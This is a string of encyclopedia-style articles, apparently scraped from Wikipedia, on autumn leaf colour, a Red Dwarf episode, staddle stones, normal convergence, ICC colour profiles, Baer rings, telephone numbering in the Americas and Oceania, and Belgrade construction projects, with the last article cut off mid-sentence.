central Argentina, the south and southeast regions of Brazil, eastern and southeastern Australia (including South Australia and Tasmania) and most of New Zealand, particularly the South Island. Climate influences Compared to Western Europe (excluding Southern Europe), North America provides many more tree species (more than 800 species and about 70 oaks, compared to 51 and three, respectively, in Western Europe) which adds many more different colors to the spectacle. The main reason is the different effect of the Ice ages while in North America, species were protected in more southern regions along north–south ranging mountains, this was not the case in much of Europe. Global warming and rising carbon dioxide levels in the atmosphere may delay the usual autumn spectacle of changing colors and falling leaves in northern hardwood forests in the future, and increase forest productivity. Specifically, higher autumn temperatures in the Northeastern United States is delaying the color change. Experiments with poplar trees showed that they stayed greener longer with higher CO2 levels, independent of temperature changes. However, the experiments over two years were too brief to indicate how mature forests may be affected over time. Other studies using 150 years of herbarium specimens found more than a one-month delay in the onset of autumn since the 19th century, and found that insect, viral, and drought stress can also affect the timing of fall coloration in maple trees. Also, other factors, such as increasing ozone levels close to the ground (tropospheric ozone pollution), can negate the beneficial effects of elevated carbon dioxide. References Notes Further reading External links Autumnal tints by Henry David Thoreau Identifying Common trees in Autumn by their colors Leaf songs Leaf morphology Plant physiology Pigmentation
Autumn leaf color
[ "Biology" ]
2,866
[ "Plant physiology", "Pigmentation", "Plants" ]
7,454,585
https://en.wikipedia.org/wiki/Epideme
"Epideme" is the seventh episode of science fiction comedy series Red Dwarf VII and the 43rd in the series run. It was first broadcast on the British television channel BBC2 on 28 February 1997. Written by Paul Alexander and Doug Naylor, and directed by Ed Bye, the episode involves Lister contracting an intelligent, but deadly, virus. Plot The crew encounters an abandoned ship, the Leviathan, which is buried in the middle of an ice planetoid. In it, they find the frozen body of Caroline Carmen, one of Lister's former crushes. She is taken on board the Starbug, where the crew attempts to thaw her out, but they are unable to melt the ice. That night, Carmen defrosts of her own accord and turns out to be in an advanced state of decomposition. She attacks Lister and spits part of her jaw and tongue down his throat, infecting him with Epideme, an intelligent virus (with an annoying personality) that was supposed to cure nicotine addiction, but in practice kills its victims within 48 hours, then reanimates their corpse to find a new victim to transfer itself to. Lister tries reasoning with Epideme directly through a communication link, but has no luck in convincing the virus to leave. Kochanski comes up with a drastic plan to save Lister's life: coax the virus to move down toward Lister's hand and then cut off the hand, isolating the virus outside his body. However, they end up cutting off Lister's right arm instead of the left one as he had requested, and they only manage to dispose of part of the Epideme virus, with the result that they only succeed in prolonging Lister's life by an hour. Lister sneaks aboard the Leviathan with some explosives, intending to kill both himself and Epideme, but the virus talks him out of it by revealing that the destination of the Leviathan was Delta VII, a research base that might have a cure. When Starbug arrives at Delta VII, it turns out that the planet has been destroyed in order to deal with a massive Epideme outbreak – a fact that the virus was fully aware of, and used in its attempt to prevent Lister from killing himself. With Lister on the verge of death, Kochanski injects Lister with a drug that stops his heart, then gets his corpse to bite her left hand, infecting it. After amputating her left arm she reveals that it was actually Caroline Carmen's arm, and that her own left arm is intact. Kryten and Kochanski then revive the now virus-free but now one-armed Lister. Production For Paul Alexander's second script, he used an old Jasper Carrott joke for the premise of the plot – "What if your flu could talk to you? Wouldn't it just say that it was doing its job?" Again, Naylor helped out with the script, tweaking it to conform to the Red Dwarf universe. An alternate ending was scripted and filmed for the episode – involving the dead arm, containing the Epideme virus, flying through space and then towards the camera – but it was decided to end the episode just before this scene. Of the many new props needed for the new series was a laser bone-saw – used for the scenes of severing the Epideme-infected arm. For the scene, Chloë Annett had taken several attempts to cut the arm off. Voice artist Gary Martin played the talking virus Epideme. He was recommended by Danny John-Jules, his friend of many years' standing, and had even been with Danny when he auditioned for the role of the Cat in the mid-eighties. Nicky Leatherbarrow also appeared, in heavy make-up, as Caroline Carmen – the initial carrier of the Epideme virus. Reception Originally broadcast on the British television channel BBC2 on 28 February 1997 in the 9:00 pm evening slot, this episode's television ratings were high. Although Series VII as a whole received a mixed response from fans and critics alike, this was considered one of the better episodes. DVDActive thought the episode was "a nice idea, and one that is well-executed ... the final scene is one of the funniest of the series." DVD Verdict thought that this episode was the first in which the character of Kochanski finally "reached her stride" after all the "attitude and aggravation during those first few shows". Sci-Fi Online noted that the episode was "particularly reminiscent of Confidence and Paranoia, since it deals with a talking disease." References External links Series VII episode guide at www.reddwarf.co.uk Red Dwarf VII episodes 1997 British television episodes Fictional viruses Fictional microorganisms
Epideme
[ "Biology" ]
983
[ "Fictional microorganisms", "Microorganisms", "Fictional viruses", "Viruses" ]
7,454,916
https://en.wikipedia.org/wiki/Staddle%20stones
Staddle stones, or steddle stones, were originally used as supporting bases for granaries, hayricks, game larders, etc. The staddle stones lifted the granaries above the ground, thereby protecting the stored grain from vermin and water seepage. In Middle English staddle, or stadle, is stathel, from Old English stathol, a foundation, support or trunk of a tree. They can be mainly found in Great Britain, Norway ("stabbur"), Galicia and Asturias (Northern Spain). Origins The name itself and evidence from surviving vernacular buildings with wooden 'feet' suggest that at first the staddles or supports were made of wood, such as at Peper Harow granary in Surrey. Stone staddles were longer lasting and a more reliable means of supporting structures which were sometimes a considerable weight. The name has become integrated into the landscape with bridges, houses, farms and other structures incorporating the name 'staddle'. Design The staddle stones usually had a separate head and base which gave the whole structure a 'mushroom'-like appearance. Different areas in the United Kingdom had different designs. The base varied from cylindrical to tapered rectangular to near triangular. Flat-topped cone-shaped staddle stones are to be found in parts of the Isle of Wight. The tops are flat to support the beams, however some variation exists, such as square tops, fluted designs, slate tops, etc. A fine example is the English Granary built 1731, supported on staddle stones, which can be seen in the Weald and Downland Open Air Museum in West Sussex. Such structures were common in southern England in the 18th century. At Higher Farm in Heathfield, Tavistock, staddle stones are part of the substantial barns built by the Duke of Bedford in the 19th century. The dressed granite stone bases have specially hewn slate tops. The materials used depended on the stone available, giving rise to sandstone, red sandstone, granite examples, etc. The tower mill at Reigate on the Wray Common ceased to work in 1895. The mill had a granary standing next to it, supported by a large number of staddle stones. The Museum of Scottish Country Life at Wester Kittochside near East Kilbride has two 'Stathels', made in Edinburgh of cast iron. The structure is basically a cast iron version of a set of staddle stones with its wooden framework. These rare survivals are still in use. Function The base stones taper towards the top with an overlapping cap stone placed above, making it almost impossible for a rodent to climb up and into the hay or grain stored above. The air could freely circulate beneath the stored crops and this helped to keep it dry. A wood framework was placed onto the tops of the stones, the staddles being arranged in two or three rows, giving sixteen or more stones. The hayricks, Tithe barns, granaries, etc. were built on top of this frame. Granaries and beehives These were often constructed with wooden weather-boards such as at Blaxland Farm in Sturry, Kent, which has nine staddles. However, if the grain was stored loose then the sides were filled in with brick nogging and light lath-and-plaster at the wall tops. Wooden steps up to the buildings were detachable and stored by hanging them up on the side of the structure. If stone or brick steps were built then the top step was not built, thus denying access to rats and other vermin. Some of these granaries had a 'cat flap' and others had a recess inside the steps which served as a dog kennel. Most granaries were used for the storage of two or three separate crops, having a capacity of 500 to 2500 bushels. The arrangement of the stones to support the structure and its weight when in use, required nine, twelve or sixteen staddles. The production of staddles was therefore a fairly significant local industry. Small granaries could make do with five, one being in the middle. The Upper Hexford granary in Oxfordshire uses thirty-six staddles. Beehives were often set on top of staddle stones to keep out predators and provide dry and airy conditions. Game larders Small staddle stones were used to support small roofed box-shaped game larders which were used on the larger estates for storage of game, such as pheasant, brought back by shooting parties, etc. Barns Timber-framed barns raised onto staddle stones were sometimes found in the south of England. Apart from the usual benefits it seems that some correlation between this barn type and the builder being a tenant exists. Being on staddles such barns remained the property of the tenant. In Galicia and Asturias (NW Spain), these barns are called hórreos. Landscape gardening Staddles are often found in architectural salvage yards as they may be seen as attractive structures. They are also sold new, being made from moulded concrete. Chainsaws are used to produce wooden 'staddle stones' for use as garden seats or ornaments. In this context the staddle stones are often called mushroom stones. Conservation Staddle stones are often well over a century old and have developed a good lichen 'patina' with slow and fast growing species adhering to the surfaces. They are better not cleaned as the lichen flora is well worth preserving to add to the biodiversity of a garden scene. Surveyors marks Old land deeds in northeastern United States often refer to Oak Staddle or Walnut Staddle. These deeds are from the late 18th century to the middle 19th century. Either the owners would cut a tree leaving the stump and request that the surveyors measure to it, or the surveyor would measure out to the location of a new lot corner and a staddle would be inserted into the ground like a boundary stone. See also The Lands of Cunninghamhead. An example of the rare Scottish Staddle Stone. Foundation (engineering) Hórreo Latte stone Museum of Scottish Rural Life, Kittochside Notes References External links Staddle stones and Game Larders Granary on Staddle Stone Staddle Stones - Salvage Yards Reproduction and Antique Staddle Stones Large collection of staddle stone images A Researcher's Guide to Local History terminology Agricultural buildings Building stone Shallow foundations Architectural elements Mechanical pest control
Staddle stones
[ "Technology", "Engineering" ]
1,332
[ "Building engineering", "Architectural elements", "Components", "Architecture" ]
7,455,080
https://en.wikipedia.org/wiki/Normal%20convergence
In mathematics normal convergence is a type of convergence for series of functions. Like absolute-convergence, it has the useful property that it is preserved when the order of summation is changed. History The concept of normal convergence was first introduced by René Baire in 1908 in his book Leçons sur les théories générales de l'analyse. Definition Given a set S and functions (or to any normed vector space), the series is called normally convergent if the series of uniform norms of the terms of the series converges, i.e., Distinctions Normal convergence implies uniform absolute convergence, i.e., uniform convergence of the series of nonnegative functions ; this fact is essentially the Weierstrass M-test. However, they should not be confused; to illustrate this, consider Then the series is uniformly convergent (for any ε take n ≥ 1/ε), but the series of uniform norms is the harmonic series and thus diverges. An example using continuous functions can be made by replacing these functions with bump functions of height 1/n and width 1 centered at each natural number n. As well, normal convergence of a series is different from norm-topology convergence, i.e. convergence of the partial sum sequence in the topology induced by the uniform norm. Normal convergence implies norm-topology convergence if and only if the space of functions under consideration is complete with respect to the uniform norm. (The converse does not hold even for complete function spaces: for example, consider the harmonic series as a sequence of constant functions). Generalizations Local normal convergence A series can be called "locally normally convergent on X" if each point x in X has a neighborhood U such that the series of functions ƒn restricted to the domain U is normally convergent, i.e. such that where the norm is the supremum over the domain U. Compact normal convergence A series is said to be "normally convergent on compact subsets of X" or "compactly normally convergent on X" if for every compact subset K of X, the series of functions ƒn restricted to K is normally convergent on K. Note: if X is locally compact (even in the weakest sense), local normal convergence and compact normal convergence are equivalent. Properties Every normal convergent series is uniformly convergent, locally uniformly convergent, and compactly uniformly convergent. This is very important, since it assures that any re-arrangement of the series, any derivatives or integrals of the series, and sums and products with other convergent series will converge to the "correct" value. If is normally convergent to , then any re-arrangement of the sequence also converges normally to the same ƒ. That is, for every bijection , is normally convergent to . See also Modes of convergence (annotated index) References Mathematical analysis Convergence (mathematics)
Normal convergence
[ "Mathematics" ]
588
[ "Sequences and series", "Mathematical analysis", "Convergence (mathematics)", "Functions and mappings", "Mathematical structures", "Mathematical objects", "Mathematical relations" ]
7,455,109
https://en.wikipedia.org/wiki/ICC%20profile
In color management, an ICC profile is a set of data that characterizes a color input or output device, or a color space, according to standards promulgated by the Interglobal Color Consortium (ICC). Profiles describe the color attributes of a particular device or viewing requirement by defining a mapping between the device source or target color space and a profile connection space (PCS). This PCS is either CIELAB (L*a*b*) or CIEXYZ. Mappings may be specified using tables, to which interpolation is applied, or through a series of parameters for transformations. Every device that captures or displays color can be profiled. Some manufacturers provide profiles for their products, and there are several products that allow an end-user to generate their own color profiles, typically through the use of a tristimulus colorimeter or a spectrophotometer (sometimes called a spectrocolorimeter). The ICC defines the format precisely but does not define algorithms or processing details. This means there is room for variation between different applications and systems that work with ICC profiles. Two main generations are used: the legacy ICCv2 and the December 2001 ICCv4. The current version of the format specification (ICC.1) is 4.4. ICC has also published a preliminary specification for iccMAX (ICC.2) or ICCv5, a next-generation color management architecture with significantly expanded functionality and a choice of colorimetric, spectral or material connection space. Details To see how this works in practice, suppose we have a particular RGB and CMYK color space, and want to convert from this RGB to that CMYK. The first step is to obtain the two ICC profiles concerned. To perform the conversion, each RGB triplet is first converted to the Profile connection space (PCS) using the RGB profile. If necessary the PCS is converted between CIELAB and CIEXYZ, a well defined transformation. Then the PCS is converted to the four values of C, M, Y, K required using the second profile. So a profile is essentially a pair of mappings; one from a color space to the PCS and a second from the PCS to the color space. A mapping might be implemented using tables of color values to be interpolated or be implemented using a series of mathematical formulae. A profile might define several mappings, according to rendering intent. These mappings allow a choice between closest possible color matching, and remapping the entire color range to allow for different gamuts. The reference illuminant of the Profile connection space (PCS) is a 16-bit fractional approximation of D50; its white point is XYZ=(0.9642, 1.000, 0.8249). Different source/destination white points are adapted using the Bradford transformation. Another kind of profile is the device link profile. Instead of mapping between a device color space and a PCS, it maps between two specific device spaces. While this is less flexible, it allows for a more accurate or purposeful conversion of color between devices. For example, a conversion between two CMYK devices could ensure that colors using only black ink convert to target colors using only black ink. References in standards The ICC profile specification, currently being progressed as International Standard ISO 15076-1:2005, is widely referred to in other standards. The following International and de facto standards are known to make reference to ICC profiles. International standards ISO/IEC 10918-1: Coding of still pictures – JPEG ISO 12234-2: Electronic still-picture imaging – Removable memory – Part 2: TIFF/EP image data format (ISO TC42) ISO 12639:2004 Graphic technology – Prepress digital data exchange – Tag Image File Format for Image Technology (TIFF/IT) (ISO TC130) ISO/DIS 12647-1: Graphic Technology – Process control for the production of halftone color separations, proof and production prints – part 1: Parameters and measurement methods (Revision under way in ISO TC130) ISO/DIS 12647-2: Graphic Technology – Process control for the production of halftone color separations, proof and production prints – part 2: Offset processes (Revision under way in ISO TC130) ISO/CD 12647-3: Graphic technology – Process control for the production of half-tone color separations, proofs and production prints – Part 3: Coldset offset lithography on newsprint ISO/CD 12647-4: Graphic technology – Process control for the production of half-tone color separations, proof and production prints – Part 4: Publication gravure printing ISO/CD 12647-6: Graphic technology – Process control for the production of half-tone color separations, proof and production prints – Part 6: Flexographic printing ISO/IEC 15948: Portable Network Graphics file format (jointly defined with W3C – see www.libpng.org/pub/png/spec/iso) ISO/IEC15444: Coding of still pictures – JPEG2000 (ISO JTC 1/SC 2) ISO 15930-1:2001 Graphic technology – Prepress digital data exchange – Use of PDF. Part 1: Complete exchange using CMYK data (PDF/X-1 and PDF/X-1a) (ISO TC130) ISO 15930-3:2002 Graphic technology – Prepress digital data exchange – Use of PDF. Part 3: Complete exchange suitable for color managed workflows (PDF/X-3) (ISO TC130) ISO 15930-4:2003 Graphic technology – Prepress digital data exchange using PDF – Part 4: Complete exchange of CMYK and spot color printing data using PDF 1.4 (PDF/X-1a) ISO 15930-5:2003 Graphic technology – Prepress digital data exchange using PDF – Part 5: Partial exchange of printing data using PDF 1.4 (PDF/X-2) ISO 15930-6:2003 Graphic technology – Prepress digital data exchange using PDF – Part 6: Complete exchange of printing data suitable for color-managed workflows using PDF 1.4 (PDF/X-3) ISO 22028-1:2004 Photography and Graphic Technology – Extended color encodings for digital image storage, manipulation and interchange – Part 1: Architecture and requirements (ISO TC42) ISO 12052 / NEMA PS3 Digital Imaging and Communications in Medicine (DICOM) ISO 32000-2 PDF Portable Document Format (international standard; originally authored by Adobe Systems, Inc.) De facto standards PICT standard specifications (file format published by Apple Computer Inc.) PostScript Language (EPS file format published by Adobe Systems Inc.) JDF v1.1 Revision A (Job Definition format published by the CIP4 consortium available) SVG (Scalable Vector Graphics) version 1.1 (file format defined by W3C available from https://www.w3.org/TR/SVG/) SWOP (Specifications for Web Offset Publications), used for CMYK print jobs, primarily in the United States See also Color management Digital printing International Color Consortium References External links ICC Frequently Asked Questions ICC profile specification ICC profiles for CMYK systems Is your system ICC Version 4 ready? – A test page for browsers Color space 1994 introductions
ICC profile
[ "Mathematics" ]
1,510
[ "Color space", "Space (mathematics)", "Metric spaces" ]
7,455,223
https://en.wikipedia.org/wiki/Baer%20ring
In abstract algebra and functional analysis, Baer rings, Baer *-rings, Rickart rings, Rickart *-rings, and AW*-algebras are various attempts to give an algebraic analogue of von Neumann algebras, using axioms about annihilators of various sets. Any von Neumann algebra is a Baer *-ring, and much of the theory of projections in von Neumann algebras can be extended to all Baer *-rings, For example, Baer *-rings can be divided into types I, II, and III in the same way as von Neumann algebras. In the literature, left Rickart rings have also been termed left PP-rings. ("Principal implies projective": See definitions below.) Definitions An idempotent element of a ring is an element e which has the property that e2 = e. The left annihilator of a set is A (left) Rickart ring is a ring satisfying any of the following conditions: the left annihilator of any single element of R is generated (as a left ideal) by an idempotent element. (For unital rings) the left annihilator of any element is a direct summand of R. All principal left ideals (ideals of the form Rx) are projective R modules. A Baer ring has the following definitions: The left annihilator of any subset of R is generated (as a left ideal) by an idempotent element. (For unital rings) The left annihilator of any subset of R is a direct summand of R. For unital rings, replacing all occurrences of 'left' with 'right' yields an equivalent definition, that is to say, the definition is left-right symmetric. In operator theory, the definitions are strengthened slightly by requiring the ring R to have an involution . Since this makes R isomorphic to its opposite ring Rop, the definition of Rickart *-ring is left-right symmetric. A projection in a *-ring is an idempotent p that is self-adjoint (). A Rickart *-ring is a *-ring such that left annihilator of any element is generated (as a left ideal) by a projection. A Baer *-ring is a *-ring such that left annihilator of any subset is generated (as a left ideal) by a projection. An AW*-algebra, introduced by , is a C*-algebra that is also a Baer *-ring. Examples Since the principal left ideals of a left hereditary ring or left semihereditary ring are projective, it is clear that both types are left Rickart rings. This includes von Neumann regular rings, which are left and right semihereditary. If a von Neumann regular ring R is also right or left self injective, then R is Baer. Any semisimple ring is Baer, since all left and right ideals are summands in R, including the annihilators. Any domain is Baer, since all annihilators are except for the annihilator of 0, which is R, and both and R are summands of R. The ring of bounded linear operators on a Hilbert space are a Baer ring and is also a Baer *-ring with the involution * given by the adjoint. von Neumann algebras are examples of all the different sorts of ring above. Properties The projections in a Rickart *-ring form a lattice, which is complete if the ring is a Baer *-ring. See also Baer *-semigroup Notes References Von Neumann algebras Ring theory
Baer ring
[ "Mathematics" ]
771
[ "Fields of abstract algebra", "Ring theory" ]
7,455,244
https://en.wikipedia.org/wiki/Telephone%20numbers%20in%20the%20Americas
All countries in the Americas use codes that start with "5", with the exception of the countries of the North American Numbering Plan, such as Canada and the United States, which use country code 1, and Greenland and Aruba with country codes starting with the digit "2", which mostly is used by countries in Africa. See also Telephone numbering plan National conventions for writing telephone numbers List of country calling codes List of international call prefixes List of North American Numbering Plan area codes Area codes in the Caribbean :Category:Telephone numbers by country International telecommunications Telecommunications in Central America Telecommunications in the Caribbean Telecommunications in North America Telecommunications in South America Telephone numbers
Telephone numbers in the Americas
[ "Mathematics" ]
130
[ "Mathematical objects", "Numbers", "Telephone numbers" ]
7,455,266
https://en.wikipedia.org/wiki/Telephone%20numbers%20in%20Oceania
Telephone numbers in Oceania use a variety of area codes to denote their location along with their own area code depending on the country's geographic makeup. They also have other prefixes to denote different types of mobile services and international calls. There are exceptions because of regional variations and time zones. Australia Country Code: +61 International Call Prefix: 0011 Trunk Prefix: 0 Telephone numbers in Australia consist of a single-digit area code (prefixed with a '0' when dialing within Australia) and eight-digit local numbers, the first four, five or six of which specify the exchange, and the remaining four, three or two a line at that exchange. (Most exchanges though have several exchange codes.) Within Australia, the area code is only required to call from one area code to another. Australia is divided geographically into a small number of large area codes, some of which cover more than one state and territory. Prior to the introduction of eight-digit numbers in the early-to-mid-1990s, telephone numbers were seven digits in the major capital cities, with a double-digit area code, and six digits in other areas with a three-digit area code. There were more than sixty such codes by 1990, with numbers running out, thus spurring the reorganization. Following reorganization of the numbering plan between 1994 and 1998, the following numbering ranges are now used: 00 International and Emergency access 01 Alternative phone services 014 Satellite phones 0163 Pager numbers 0198 Data numbers (e.g. 0198 308 888 is the dial-up PoP number for Telstra) 02 Geographic: Central East region (New South Wales and the Australian Capital Territory) 03 Geographic: South-east region (Victoria and Tasmania) 04 Digital Mobile services (3G, 4G, 5G and GSM) 0550 Location Independent Communication Services 07 Geographic: North-east region (Queensland) and Tweed Heads 08 Geographic: Central and West region (South Australia, Northern Territory, Western Australia) and Broken Hill 1 Non-geographic numbers (mostly for domestic use only) National numbers have no geographic significance. Other numbers relate to a particular telephone service area. However, allowances are made for regional variations; sometimes the codes do not strictly follow state borders. For example, Broken Hill in New South Wales uses the 08 area code, due to its closer proximity to Adelaide than the state capital Sydney, and Broken Hill area's inclusion in the Australian Central Standard Time zone. The previous area code for Broken Hill was (080). Other examples include towns in Southern New South Wales close to the border with Victoria that use the 03 (Victoria and Tasmania) prefix, including: Balranald, Wentworth and Deniliquin). Some parts of the Tweed Coast of New South Wales have an area code of 07 followed by a subscriber number of 55xx xxxx (and new numbers 56xx xxxx). This means it is the cost of a local call to phone the Gold Coast in neighbouring Queensland, since the metropolis covers both sides of the NSW/Qld border. It is also a local call to adjoining NSW 02 667x xxxx numbers from these areas, and other southern Gold Coast exchanges (07 prefix numbers must dial the 02 to access these). Australian Antarctic Territory Country Code: +672 1x International Call Prefix: 00 Trunk Prefix: Christmas Island Country Code: +61 8 9164 – part of the Australian numbering system International Call Prefix: 0011 Trunk Prefix: 0 Cocos (Keeling) Islands Country Code: +61 8 9162 – part of the Australian numbering system International Call Prefix: 0011 Trunk Prefix: 0 Norfolk Island Country Code: +672 3 International Call Prefix: 00 Trunk Prefix: Easter Island Country Code: +56 32 International Call Prefix: 00 Trunk Prefix: East Timor Country Code: +670 International Call Prefix: 00 Trunk Prefix: Federated States of Micronesia Country Code: +691 International Call Prefix: 00 Trunk Prefix: Fiji Country Code: +679 International Call Prefix: 00 Trunk Prefix: French Polynesia Country Code: +689 International Call Prefix: 00 Trunk Prefix: Kiribati Country Code: +686 International Call Prefix: 00 Trunk Prefix: Marshall Islands Country Code: +692 International Call Prefix: 00 Trunk Prefix: Nauru Country Code: +674 International Call Prefix: 00 Trunk Prefix: New Caledonia Country Code: +687 International Call Prefix: 00 Trunk Prefix: New Zealand Country Code: +64 International Call Prefix: 00 Trunk Prefix: 0 Since 1993, land-line telephone numbers in New Zealand consist of a single-digit area code and seven-digit local numbers, the first three of which generally specify the exchange and the final four a line at that exchange. The domestic long distance prefix is '0'. The dialing plan used in NZ reflects the national structure implemented by the New Zealand Post Office prior to the privatisation of the telecommunications services (and the creation of the Telecom New Zealand corporation). Domestic phone numbers with a first digit in range 2-8 are generally managed by Telecom. Phone numbers beginning with 9 are usually those from other companies, for example TelstraClear. These allocations were firm until April 2007, whereupon full number portability was introduced; numbers can now be moved between carriers. . There are currently no regions issued numbers starting with 1 - except for the national emergency services access number, '111'. There are five regional area codes in use for landline calls, For example, a domestic toll call destined for a South Island location requires the dial prefix '03', being domestic-long-distance + 3 for the South Island. Mobile phone numbers are prefixed with 02, followed by one digit and the subscriber's number, which is either six, seven or eight digits, dialled in full, e.g. 021 xxx xxx or 027 xxx xxxx. With the introduction of number portability the number prefix is no longer a sure indicator as to the terminating network, but the following table lists the "default" mobile numbering prefixes: Free call services generally use the prefix 0800 (via Telecom NZ) or 0508 (via TelstraClear), while local rate (usually internet access numbers) have the prefix 08xx. Premium rate services use the code 0900 followed by five digits. Neither of these are accessible internationally. The International dialing prefix is '00', though other prefixes are available (i.e. 0161, for discounted rates, or 0168, for access to USA 1800 numbers). To dial into New Zealand from overseas, the leading 0 should be dropped from all area codes. (For example, an 021 xxx xxxx number would be reached by dialing +64 21 xxx xxxx). Cook Islands Country Code: +682 International Call Prefix: 00 Trunk Prefix: Niue Country Code: +683 International Call Prefix: 00 Trunk Prefix: Tokelau Country Code: +690 International Call Prefix: 00 Trunk Prefix: Palau Country Code: +680 International Call Prefix: 011 or 012 Trunk Prefix: Papua New Guinea Country Code: +675 International Call Prefix: 00 Trunk Prefix: Pitcairn Islands Country Code: +64 xx – previously +870 satellite phone only International Call Prefix: 00 Trunk Prefix: Samoa Country Code: +685 International Call Prefix: 0 Trunk Prefix: Solomon Islands Country Code: +677 International Call Prefix: 00 or 01 Trunk Prefix: Tonga Country Code: +676 International Call Prefix: 00 Trunk Prefix: Tuvalu Country Code: +688 International Call Prefix: 00 Trunk Prefix: United States Territories The following territories of the United States are part of the North American Numbering Plan, and no longer have their own country codes: +1-670 - Northern Mariana Islands from 1 July 1998 (previously +670) +1-671 - Guam from 1 July 1998 (previously +671) +1-684 - American Samoa from 2 October 2004 (previously +684) Vanuatu Country Code: +678 International Call Prefix: 00 Trunk Prefix: Wallis and Futuna Country Code: +681 International Call Prefix: 00 Trunk Prefix: See also List of country calling codes List of international call prefixes Telephone numbering plan :Category:Telephone numbers by country References International telecommunications Telecommunications in Oceania Telephone numbers Telecommunications in Australia Telecommunications in New Zealand
Telephone numbers in Oceania
[ "Mathematics" ]
1,720
[ "Mathematical objects", "Numbers", "Telephone numbers" ]
7,455,277
https://en.wikipedia.org/wiki/List%20of%20architectural%20projects%20in%20Belgrade
There are many architectural projects under construction in Belgrade, Serbia. Since 2002, Belgrade has experienced a major construction boom. These are only some of the projects under construction in Belgrade: Under construction Residential, office and retail projects: New Belgrade Airport City Belgrade Under construction is one 14-story building with underground garages. Three new buildings including one Crowne Plaza hotel will start in 2020. Airport Garden residential buildings started in 2019. Wellport Belgrade Condominium project started in 2018. Estimated cost is 130 million Euros. Savada 3 New residential project in New Belgrade. Zep Terra Mixed use project by Zepter International. It will have 75k sqm of residential and 20k sqm of office space. Sakura Park Belgrade 228 apartments New Minel Project will have 120.000 sq meters of residential space. Investment estimated apx 100 million euros. Exing Home 65 Residential project of 24.000 sq meters. Park 11 Residential project by Energoprojekt. BLOK 23 Office Project of 50.000 sqm of premium office space in Block 23. After 8 years on hold, new owner finishing project. Tempo Tower business and residential project of 112,000 sq meters and 120 meters tall. Old City Belgrade Belgrade Waterfront One of the biggest construction projects in Europe with an estimated investment of 3,5 billion Euros. Belgrade Skyline 200 million euro project. three towers with height of 132m,120m and 102m. Started in 2017. Dorcol Centar New residential project in Cara Dusana street. K-District New Office-RESIDENTIAL project in oldest part of the city. Next to city Zoo and Kalemegden fortress. Investment 90 million Euros. Kneza Milosa Residence 150 million Euros for new residential block in Kneza Milosa st, on the place of former US Embassy. New Dorcol Residential project of 100.000 sq meters in Lower Dorcol. Other parts of the city Vila Banjica 280,000 sqm new gated residential project. Vozdova Kapija Residential Condo Project of 170 million euros. Project started in 2017. Zemunske Kapije Business and residential Project. East Side Complex 34.000 sqm residential project. Big Residences Total investment of 200 million euros under construction next to the Big shopping mall. Almost 1100 apartments will be constructed with 2200 parking spots. First phase of shopping area is opened in December 2019. IKEA Retail Center Additional Center next to the IKEA Istok. Will have 40.000 sq.m and will cost 70 million Euros. Transportation, medical and infrastructural projects Belgrade Metro Two lines of total 42 km under construction. First line will be open in 2028, second in 2030. Total cost 9bn Euros. Belgrade bypass New Orlovaca, Batajnica interchange and connection to Bubanj Potok bypass with new interchange is under construction. Belgrade Centre railway station a mega-project that's scheduled to begin in September 2020, resulting in relocation of the main railway station and its railway tracks, which will consequently free up building space in Belgrade's inner centre. The entire project is worth an estimated 2 billion US dollars, and is scheduled to be completed within a decade. The Serbian company Energoproject will invest €200 million. Already invested over a billion dollars. Makis 2 Water production facility. Tirsova 2 New children hospital under constriction next to Tirsova 1 hospital. Construction scheduled for 2020. 75 million Euros. Interceptor Collector Sewer system collector under construction. Estimate cost 500 million $. Belgrade-Budapest High speed railroad Construction started in 2017. Vinca Waste Management and Bioenergy Plant Construction started in 2017. Project worth 300 million Euros and managed by Vinci SA. Heating System Pipe Connection between Nikola Tesla Power Plant and Heating Plant New BelgradeInvestment 190 million Euros from Power Construction Corporation of China. Starts in 2018. Cleaning Sewer Water Plant Veliko Selo with additional interceptor. Power Construction Corporation of China is contractor. Investment 385 million euros in Phase 1. Started in 2018. Belgrade Nikola Tesla Airport expansion by Vinci SA worth of 770 million Euros. Clinical Centre of Serbia Upgrade and expansion of main building. Started in late 2018. Project cost 110 million Euros. Belgrade Bus Station New BAS station is under construction in New Belgrade. Construction started in 2019. Old main station is demolished in Old town. New Belgrade Railway Station is under expanding reconstruction. Planned projects The Old Airport Congress center New Belgrade with 35-storey tower (144 m). Kopernikus Residential Towers in New Belgrade. Twin towers of 156 meters. Merin Tower Mixed use tower will be next to the NCR Campus in Block 42. It will have 28th floors and 100m height. Alta Tower 28 floor residential tower in New Belgrade. Delta Center Block 20 Twin towers of 100m height in Block 20 New Belgrade. One tower will be Hotel Intercontinental. Planned in 2021. Kempinski Hotel (reconstruction of Hotel Jugoslavija): in New Belgrade on the banks of the Danube. Expansion will add two twin 144 m tall 33-story skyscrapers. Casino Austria already invested about €60 million. Novak Tennis Center will be built in New Belgrade's in Blok 45. The complex will consist of 20–30 smaller tennis courts, and one main court with 5000 seats. The center will also have a tennis academy, a hotel, a hostel and other facilities. One of the owners will be ace Novak Djokovic, after whom it is named. IKEA Zapad Another IKEA store will be located close to the airport. Belgrade - Zrenjanin Expressway New 57 km new expressway worth of 300 million Euros. Ada Huja Bridge New bridge across river Danube. Construction starts in 2020 and worth it 120 million Euros. National Stadium will be constructed in Municipality of Surcin. It will have 65.000 seats and it will cost around 250 million Euros. Recently finished projects GTC X New office building pin New Belgrade. Opened in 2022. NCR Corporation Campus will employ 5.000 employees and cost 90 million dollars. Opened in 2022. Chinese Cultural Center Belgrade Chinese Cultural Center will be one of the biggest in the world with a total of 32.000 sq meters. It will be located where the bombed Chinese Embassy in 1999 stood. When done, will be the largest Chinese Cultural Center in Europe. Total investment 45 million Euros. Opened in 2022. West 65 Project of 152.000 sq m and a 40-storey tower (155 m) in New Belgrade. Tallest residential skyscraper in Belgrade opened in 2022. Dedinje 2 New Cardic Surgery hospital next to Dedinje 1 Hospital. Opened in 2021. Batajnica Hospital is new 18.000 sqm hospital in Batajnica suburb. Construction done in just four months. Opened in 12/2020. Sirius Business Center Last phase finished in December 2020. GTC Green Heart Business complex of 87.000 square meters in New Belgrade. Opened in October 2020. MPC Navigator 2 Office building which will be next to the recently finished Navigator 1 in New Belgrade. Opened in September 2020. Ostružnica Bridge Second half of three lanes is opened in June 2020 as part of Belgrade beltway ring. Usce Tower 2 Twin tower next to Usce Tower in New Belgrade. Opened in June 2020. BEO Shopping Mall 130.000 sqm in Zvezdara municipality. Opened in June 2020. A Block 200,000 sq m office and residential spaces. Investment 200 million euros. Finished in 2019. Expressway Surcin-Obrenovac 17 km new expressway with new Obrenovac-Surčin Bridge (A2 motorway), as part of new expressway toward Montenegro. Opened in December 2019. Meita 